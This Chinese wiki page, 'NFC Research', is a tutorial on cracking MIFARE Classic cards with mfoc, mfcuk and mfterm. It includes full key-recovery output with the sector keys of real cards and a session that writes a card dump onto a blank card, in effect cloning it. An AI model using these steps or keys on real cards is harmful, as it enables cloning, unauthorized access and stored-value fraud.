NFC Research
(→解码) |
(→写入) |
||
第334行: | 第334行: | ||
== 写入 == | == 写入 == | ||
− | < | + | <source lang=bash> |
# mfoc -P 500 -O blank.card.orig.dump | # mfoc -P 500 -O blank.card.orig.dump | ||
ISO/IEC 14443A (106 kbps) target: | ISO/IEC 14443A (106 kbps) target: | ||
第500行: | 第500行: | ||
Reading: [................] Success! | Reading: [................] Success! | ||
Read MIFARE Classic 1k (SAK: 08, ATQA: 00 04) | Read MIFARE Classic 1k (SAK: 08, ATQA: 00 04) | ||
− | </ | + | </source> |
<br><br> | <br><br> |
2017年7月17日 (一) 09:37的版本
目录 |
1 概述
NFC 即 Near Field Communication,即近距离无线通讯技术。允许电子设备之间进行非接触式点对点数据传输,在十厘米(3.9英吋)内交换数据。
这个技术由 RFID 演变而来,由飞利浦半导体(现恩智浦半导体,NXP)、诺基亚和索尼共同研制开发,其基础是 RFID 及互连技术。
近场通信是一种短距高频的无线电技术,在13.56MHz频率运行于20厘米距离内。其传输速度有 106 Kbit/s、212 Kbit/s 或者 424 Kbit/s 三种。
目前近场通信已通过成为ISO/IEC IS 18092国际标准、EMCA-340标准与ETSI TS 102 190标准
NFC 向下兼容 RFID,其将非接触读卡器、非接触卡和点对点功能整合进一块单芯片,通俗的说 NFC 就是 RFID 的演进版本
2 设备
- ACS 122U
- 使用广泛的 NFC 读卡器(USB 接口)
- 带 NFC 的手机
- 魅族 MX3
- Oppop Find 5
- 小米2A,小米3
- SONY Xperia V LT25i
- Samsung Galaxy Note 3、Galaxy Note 2、Galaxy Note、Galaxy S2、Galaxy S3、Galaxy S4
- Nokia Lumia720、Lumia 820、Lumia 920 以及 Lumia925、Lumia928 和 Lumia1020
- proxmark3
3 工作模式
卡模式(Card emulation):这个模式其实就是相当于一张采用 RFID 技术的IC卡。可以替代现在大量的IC卡(包括信用卡)场合商场刷卡、悠游卡、门禁管制,车票,门票等等。此种方式下,有一个极大的优点,那就是卡片通过非接触读卡器的 RF 域来供电,即便是寄主设备(如手机)没电也可以工作
点对点模式(P2P mode):这个模式和红外线差不多,可用于数据交换,只是传输距离较短,传输创建速度较快,传输速度也快些,功耗低(蓝牙也类似)。将两个具备NFC功能的设备链接,能实现数据点对点传输,如下载音乐、交换图片或者同步设备地址薄
读卡器模式(Reader/writer mode):作为非接触式读卡器使用,比如读取市政交通一卡通的余额和交易记录,从海报或者展览信息电子标签上读取相关信息等
4 解码
Mifare 1 S50 (1K EEPROM) 和 Mifare 1 S70 (4K EEPROM) 早以被全面爆破,现在最新的应用都是 Mifare DESFire
硬件: ACR 122U,人民币 200 左右
软件: 开源工具
- 扫 keys: mfoc http://code.google.com/p/mfoc/
- 爆破一个区的 key: mfcuk http://code.google.com/p/mfcuk/
- Mifare Classic Card 辅助工具: mfterm https://github.com/4ZM/mfterm
- 核心支持库: libnfc http://code.google.com/p/libnfc/
1. 编译
$ wget http://libnfc.googlecode.com/files/libnfc-1.7.0.tar.bz2 $ tar jxf libnfc-1.7.0.tar.bz2 $ cd libnfc-1.7.0 $ ./configure # 默认使用的 ACR122U 的 driver 是 acr122_usb,直接USB通讯而不是通过 acr122_pcsc 这个driver 去通过中间件 PCSC 支持读卡器 $ make $ sudo make install $ wget http://mfoc.googlecode.com/files/mfoc-0.10.6.tar.gz && tar -xvzf mfoc-0.10.6.tar.gz $ cd mfoc-0.10.6 $ ./configure $ make $ sudo make install $ git clone git://github.com/4ZM/mfterm $ cd mfterm $ ./autogen.sh $ ./configure $ make $ sudo make install mfcuk 同理,编译过程中缺库,补上即可
2. 扫 key
确认系统发现 ACR122U:
$ nfc-list nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d error libnfc.driver.acr122_usb Unable to claim USB interface (Operation not permitted) nfc-list: ERROR: Unable to open NFC device: acr122_usb:001:009 $ sudo nfc-list nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d NFC device: ACS / ACR122U PICC Interface opened 在 vmware 虚拟机上没法工作,老出现 Unable to write USB interface 错误 </pre> 开始扫所有 Sector 的 key: <pre> $ sudo mfoc -P 500 -O dump.card.file ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 02 * UID size: single * bit frame anticollision supported UID (NFCID1): 25 55 aa 10 SAK (SEL_RES): 18 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 4K * MIFARE Plus (4 Byte UID or 4 Byte RID) 4K, Security level 1 * SmartMX with MIFARE 4K emulation Other possible matches based on ATQA & SAK values: Try to authenticate to all sectors with default keys... Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found [Key: ffffffffffff] -> [........................................] [Key: a0a1a2a3a4a5] -> [/.......................................] [Key: d3f7d3f7d3f7] -> [/.......................................] [Key: 000000000000] -> [/.......................................] [Key: b0b1b2b3b4b5] -> [/.......................................] [Key: 4d3a99c351dd] -> [/.......................................] [Key: 1a982c7e459a] -> [/.......................................] [Key: aabbccddeeff] -> [/.......................................] [Key: 714c5c886e97] -> [/.......................................] [Key: 587ee5f9350f] -> [/.......................................] [Key: a0478cc39091] -> [/.......................................] [Key: 533cb6c723f6] -> [/.......................................] [Key: 8fd0a4f256e9] -> [/.......................................] Sector 00 - FOUND_KEY [A] Sector 00 - UNKNOWN_KEY [B] Sector 01 - UNKNOWN_KEY [A] Sector 01 - UNKNOWN_KEY [B] Sector 02 - UNKNOWN_KEY [A] Sector 02 - UNKNOWN_KEY [B] Sector 03 - UNKNOWN_KEY [A] Sector 03 - UNKNOWN_KEY [B] Sector 04 - UNKNOWN_KEY [A] Sector 04 - UNKNOWN_KEY [B] Sector 05 - UNKNOWN_KEY [A] Sector 05 - UNKNOWN_KEY [B] Sector 06 - UNKNOWN_KEY [A] Sector 06 - UNKNOWN_KEY [B] Sector 07 - UNKNOWN_KEY [A] Sector 07 - UNKNOWN_KEY [B] Sector 08 - UNKNOWN_KEY [A] Sector 08 - UNKNOWN_KEY [B] Sector 09 - UNKNOWN_KEY [A] Sector 09 - UNKNOWN_KEY [B] Sector 10 - UNKNOWN_KEY [A] Sector 10 - UNKNOWN_KEY [B] Sector 11 - UNKNOWN_KEY [A] Sector 11 - UNKNOWN_KEY [B] Sector 12 - UNKNOWN_KEY [A] Sector 12 - UNKNOWN_KEY [B] Sector 13 - UNKNOWN_KEY [A] Sector 13 - UNKNOWN_KEY [B] Sector 14 - UNKNOWN_KEY [A] Sector 14 - UNKNOWN_KEY [B] Sector 15 - UNKNOWN_KEY [A] Sector 15 - UNKNOWN_KEY [B] Sector 16 - UNKNOWN_KEY [A] Sector 16 - UNKNOWN_KEY [B] Sector 17 - UNKNOWN_KEY [A] Sector 17 - UNKNOWN_KEY [B] Sector 18 - UNKNOWN_KEY [A] Sector 18 - UNKNOWN_KEY [B] Sector 19 - UNKNOWN_KEY [A] Sector 19 - UNKNOWN_KEY [B] Sector 20 - UNKNOWN_KEY [A] Sector 20 - UNKNOWN_KEY [B] Sector 21 - UNKNOWN_KEY [A] Sector 21 - UNKNOWN_KEY [B] Sector 22 - UNKNOWN_KEY [A] Sector 22 - UNKNOWN_KEY [B] Sector 23 - UNKNOWN_KEY [A] Sector 23 - UNKNOWN_KEY [B] Sector 24 - UNKNOWN_KEY [A] Sector 24 - UNKNOWN_KEY [B] Sector 25 - UNKNOWN_KEY [A] Sector 25 - UNKNOWN_KEY [B] Sector 26 - UNKNOWN_KEY [A] Sector 26 - UNKNOWN_KEY [B] Sector 27 - UNKNOWN_KEY [A] Sector 27 - UNKNOWN_KEY [B] Sector 28 - UNKNOWN_KEY [A] Sector 28 - UNKNOWN_KEY [B] Sector 29 - UNKNOWN_KEY [A] Sector 29 - UNKNOWN_KEY [B] Sector 30 - UNKNOWN_KEY [A] Sector 30 - UNKNOWN_KEY [B] Sector 31 - UNKNOWN_KEY [A] Sector 31 - UNKNOWN_KEY [B] Sector 32 - UNKNOWN_KEY [A] Sector 32 - UNKNOWN_KEY [B] Sector 33 - UNKNOWN_KEY [A] Sector 33 - UNKNOWN_KEY [B] Sector 34 - UNKNOWN_KEY [A] Sector 34 - UNKNOWN_KEY [B] Sector 35 - UNKNOWN_KEY [A] Sector 35 - UNKNOWN_KEY [B] Sector 36 - UNKNOWN_KEY [A] Sector 36 - UNKNOWN_KEY [B] Sector 37 - UNKNOWN_KEY [A] Sector 37 - UNKNOWN_KEY [B] Sector 38 - UNKNOWN_KEY [A] Sector 38 - UNKNOWN_KEY [B] Sector 39 - UNKNOWN_KEY [A] Sector 39 - UNKNOWN_KEY [B] Using sector 00 as an exploit sector Sector: 1, type A, probe 0, distance 15105 ..... Sector: 1, type A, probe 1, distance 15147 ..... Found Key: A [2c5a3710d3a5] Sector: 2, type A, probe 0, distance 15147 ..... Found Key: A [c3a4fa8db109] Sector: 3, type A, probe 0, distance 15147 ..... Found Key: A [3c34515b11d4] Sector: 4, type A, probe 0, distance 15149 ..... Found Key: A [0725a08f31e6] Sector: 5, type A, probe 0, distance 15151 ..... Found Key: A [5601f83644bb] Sector: 6, type A, probe 0, distance 15149 ..... Sector: 6, type A, probe 1, distance 15149 ..... Sector: 6, type A, probe 2, distance 15149 ..... Found Key: A [20f2bf55ac1a] Sector: 7, type A, probe 0, distance 15147 ..... Found Key: A [dd77fb8c3736] Sector: 8, type A, probe 0, distance 15149 ..... Sector: 8, type A, probe 1, distance 15147 ..... Found Key: A [c2180972c580] Sector: 9, type A, probe 0, distance 15151 ..... Found Key: A [742c582e8c04] Sector: 10, type A, probe 0, distance 15151 ..... Sector: 10, type A, probe 1, distance 15193 ..... Sector: 10, type A, probe 2, distance 15151 ..... Found Key: A [db338f92bb98] Sector: 11, type A, probe 0, distance 15151 ..... Found Key: A [15559907e873] Sector: 12, type A, probe 0, distance 15151 ..... Found Key: A [c8313c454d2a] Sector: 13, type A, probe 0, distance 15149 ..... Sector: 13, type A, probe 1, distance 15149 ..... Found Key: A [c896c22e5b3e] Sector: 14, type A, probe 0, distance 15149 ..... Found Key: A [72558e3fe66c] Sector: 15, type A, probe 0, distance 15151 ..... Found Key: A [aec383ce3c12] ...... ......
完成后会把整个数据写入 dump.card.file 这个文件
3. 再读
扫描到所有区的 key 后,再读的话,可以在 mfterm 中直接加载 dump.card.file 这个文件,mfterm 会自动取出所有 key,再行读写就快很多
带 NFC 功能的手机,可以使用 MifareClassicTool 这个工具,移动读写,方便很多
comcat@jackslab:~$ mfterm $ read No key argument (A|B) given. Defaulting to A error libnfc.driver.acr122_usb Unable to claim USB interface (Operation not permitted) Could not connect to any NFC device comcat@jackslab:~$ sudo mfterm $ help quit Exit the program. load Load tag data from a file. save Save tag data to a file. clear Clear the current tag data. read A|B : Read tag data from a physical tag. read unlocked On pirate cards, read card without keys. write A|B : Write tag data to a physical tag. write unlocked On pirate cards, write 1k tag with block 0. print 1k|4k : Print tag data. print keys 1k|4k : Print tag's keys. print ac Print access conditions. set #block #offset = xx xx xx : Set tag data. keys load Load keys from a file. keys save Save keys to a file. keys clear Clear the keys. keys set A|B #S key : Set a key value. keys import Import keys from the current tag. keys test Try to authenticate with the keys. keys 1k|4k : Print the keys. dict load Load a dictionary key file. dict clear Clear the key dictionary. dict attack Find keys of a physical tag. dict Print the key dictionary. spec load Load a specification file. spec clear Unload the specification. spec Print the specification. mac key <k0..k7> : Get or set MAC key. mac compute #block : Compute block MAC. mac update #block : Compute block MAC. mac validate 1k|4k : Validates block MAC of the whole tag. $ read No key argument (A|B) given. Defaulting to A Connected to device, but no tag found. $ keys load dump.card.file # 直接解析 dump 出的整个卡数据,加载 keys Successfully loaded keys from: dump.card.file $ keys xS xB KeyA KeyB ---------------------------------- 00 03 c0c1c2c3c4c5 a1475c9ee325 01 07 2c5c3710d3c5 b40b2c0d47f1 02 0b c1f4ff83b109 dc0fc2d4d8cc 03 0f 3c34515b11d4 b42fc69d3ccf 04 13 0725c08f31e6 f8cf2c85e843 05 17 5601f83644bb c9398274cc1d 06 1b 20f2bf55cc1c 8f5cd31b4f53 07 1f dd77fb8c3736 e95fc402e7b6 08 23 c2180972c580 d43ec542967d 09 27 742c582e8c04 d43ec542967d 0a 2b db338f92bb98 e92d77b9c1f2 0b 2f 15559907e873 4f94956dfce7 0c 33 c8313c454d2c 25860937cf4d 0d 37 c896c22e5b3e 717b5b4b67d2 0e 3b 72558e3fe66c cded278592c2 0f 3f cec383ce3c12 f1475c9ee325 $ keys test 4k A # key 验证 $ keys save /tmp/a Successfully wrote keys to: /tmp/a $ keys load /tmp/a Successfully loaded keys from: /tmp/a $ read # 读取卡上所有数据 No key argument (A|B) given. Defaulting to A Reading: [.........0x13.0x12.0x11.0x10................] Auth errors in indicated sectors. Read MIFARE Classic 4k (SAK: 18, ATQA: 00 02) $ quit comcat@jackslab:~$
5 写入
# mfoc -P 500 -O blank.card.orig.dump ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 * UID size: single * bit frame anticollision supported UID (NFCID1): f5 15 e9 c4 SAK (SEL_RES): 08 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 1K * MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1 * SmartMX with MIFARE 1K emulation Other possible matches based on ATQA & SAK values: Try to authenticate to all sectors with default keys... Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found [Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx] [Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx] [Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx] ...... ...... Sector 00 - FOUND_KEY [A] Sector 00 - FOUND_KEY [B] Sector 01 - FOUND_KEY [A] Sector 01 - FOUND_KEY [B] Sector 02 - FOUND_KEY [A] Sector 02 - FOUND_KEY [B] ...... ...... We have all sectors encrypted with the default keys.. Auth with all sectors succeeded, dumping keys to a file! Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...... ...... # nfc-mfclassic W a ykt20.dump blank.card.orig.dump f NFC reader: ACS / ACR122U PICC Interface opened Found MIFARE Classic card: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 UID (NFCID1): f5 15 e9 c4 SAK (SEL_RES): 08 Guessing size: seems to be a 1024-byte card Sent bits: 50 00 57 cd Sent bits: 40 (7 bits) unlock failure! # nfc-mfclassic w a ykt20.dump blank.card.orig.dump NFC reader: ACS / ACR122U PICC Interface opened Found MIFARE Classic card: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 UID (NFCID1): f5 15 e9 c4 SAK (SEL_RES): 08 Guessing size: seems to be a 1024-byte card Writing 64 blocks |...............................................................| Done, 63 of 64 blocks written. # mfoc -P 500 -O dump.card.file ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 * UID size: single * bit frame anticollision supported UID (NFCID1): f5 15 e9 c4 SAK (SEL_RES): 08 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 1K * MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1 * SmartMX with MIFARE 1K emulation Other possible matches based on ATQA & SAK values: Try to authenticate to all sectors with default keys... Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found [Key: ffffffffffff] -> [................] [Key: a0a1a2a3a4a5] -> [/...............] [Key: d3f7d3f7d3f7] -> [/...............] [Key: 000000000000] -> [/...............] ...... ...... Sector 00 - FOUND_KEY [A] Sector 00 - UNKNOWN_KEY [B] Sector 01 - UNKNOWN_KEY [A] Sector 01 - UNKNOWN_KEY [B] Sector 02 - UNKNOWN_KEY [A] Sector 02 - UNKNOWN_KEY [B] ...... ...... Using sector 00 as an exploit sector Sector: 1, type A, probe 0, distance 32 ..... Sector: 1, type A, probe 1, distance 32 ..... Found Key: A [2c5a3710d3a5] Sector: 2, type A, probe 0, distance 32 ..... Sector: 2, type A, probe 1, distance 32 ..... Found Key: A [c1f4ff83b109] Sector: 3, type A, probe 0, distance 32 ..... Sector: 3, type A, probe 1, distance 32 ..... Found Key: A [3c34515b11d4] Sector: 4, type A, probe 0, distance 32 ..... Found Key: A [0725a08f31e6] Sector: 5, type A, probe 0, distance 32 ..... Found Key: A [5601f83644bb] ...... ...... Auth with all sectors succeeded, dumping keys to a file! Block 63, type A, key aec383ce3c12 :00 00 00 00 00 00 7f 07 88 00 00 00 00 00 00 00 Block 62, type A, key aec383ce3c12 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 61, type A, key aec383ce3c12 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...... ...... # mfterm $ keys load dump.card.file Successfully loaded keys from: dump.card.file $ keys xS xB KeyA KeyB ---------------------------------- 00 03 a0a1a2a3a4a5 f1475c9ee325 01 07 2c5a3710d3a5 840b2a0d47f1 02 0b c1f4ff83b109 dc0fa2d4d8aa 03 0f 3c34515b11d4 b42fa69d3acf 04 13 0725a08f31e6 f8cf2c85e843 05 17 5601f83644bb c9398274ca1d 06 1b 20f2bf55ac1a 8f5ad31b4f53 07 1f dd77fb8c3736 e95fc402e7b6 08 23 c2180972c580 d43ea542967d 09 27 742c582e8c04 d43ea542967d 0a 2b db338f92bb98 e92d77b9a1f2 0b 2f 15559907e873 4f94956dfae7 0c 33 c8313c454d2a 25860937af4d 0d 37 c896c22e5b3e 717b5b4b67d2 0e 3b 72558e3fe66c aded278592c2 0f 3f aec383ce3c12 f1475c9ee325 $ keys load ykt20.dump Successfully loaded keys from: ykt20.dump $ keys xS xB KeyA KeyB ---------------------------------- 00 03 a0a1a2a3a4a5 f1475c9ee325 01 07 2c5a3710d3a5 840b2a0d47f1 02 0b c1f4ff83b109 dc0fa2d4d8aa 03 0f 3c34515b11d4 b42fa69d3acf 04 13 0725a08f31e6 f8cf2c85e843 05 17 5601f83644bb c9398274ca1d 06 1b 20f2bf55ac1a 8f5ad31b4f53 07 1f dd77fb8c3736 e95fc402e7b6 08 23 c2180972c580 d43ea542967d 09 27 742c582e8c04 d43ea542967d 0a 2b db338f92bb98 e92d77b9a1f2 0b 2f 15559907e873 4f94956dfae7 0c 33 c8313c454d2a 25860937af4d 0d 37 c896c22e5b3e 717b5b4b67d2 0e 3b 72558e3fe66c aded278592c2 0f 3f aec383ce3c12 f1475c9ee325 $ read No key argument (A|B) given. Defaulting to A Reading: [................] Success! Read MIFARE Classic 1k (SAK: 08, ATQA: 00 04)